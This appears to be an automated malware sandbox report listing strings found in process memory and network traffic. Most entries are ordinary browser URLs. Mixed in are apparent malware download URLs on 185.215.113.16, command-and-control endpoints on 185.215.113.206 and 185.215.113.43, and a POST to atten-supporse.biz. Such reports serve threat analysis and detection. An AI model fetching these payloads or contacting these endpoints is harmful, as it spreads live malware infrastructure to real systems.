                          Source: firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2826478847.000002BA5A31B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: www.youtube.comZ equals www.youtube.com (Youtube)
                          Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
                          Source: global trafficDNS traffic detected: DNS query: atten-supporse.biz
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                          Source: global trafficDNS traffic detected: DNS query: youtube.com
                          Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                          Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: example.org
                          Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                          Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
                          Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                          Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/2
                          Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/H
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe61395d7f
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exep
                          Source: ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C5C000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2751970018.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752988072.0000000000C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                          Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exez
                          Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exezC
                          Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exezI
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exeb
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe_
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                          Source: ae5cfd188c.exe, 00000007.00000003.2752889103.0000000000C44000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2753147956.0000000000C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/z
                          Source: ae5cfd188c.exe, 00000007.00000003.2753332198.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
                          Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                          Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                          Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/P
                          Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 00000009.00000002.2578174288.0000000001484000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
                          Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmp, 37df924488.exe, 0000001B.00000002.2764793088.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
                          Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/a
                          Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php8
                          Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/o
                          Source: 37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                          Source: 37df924488.exe, 00000009.00000002.2578174288.000000000143E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206Oz
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Local
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php&
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3539001
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php95dA
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2915523016.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php?
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpJ
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa4
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpl
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedF
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedl
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnu
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpnub
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpu.
                          Source: skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/ones
                          Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
                          Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
                          Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
                          Source: firefox.exe, 00000018.00000002.2827730700.000002BA5A451000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 00000018.00000002.2844309945.000002BA5BCE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A231000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A267000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 00000018.00000002.2852168506.000002BA5C4F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B76000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2739033143.000002BA5C4F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D05A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2795803239.000002BA555B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 00000018.00000002.2797999061.000002BA55D3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A26C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A26C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
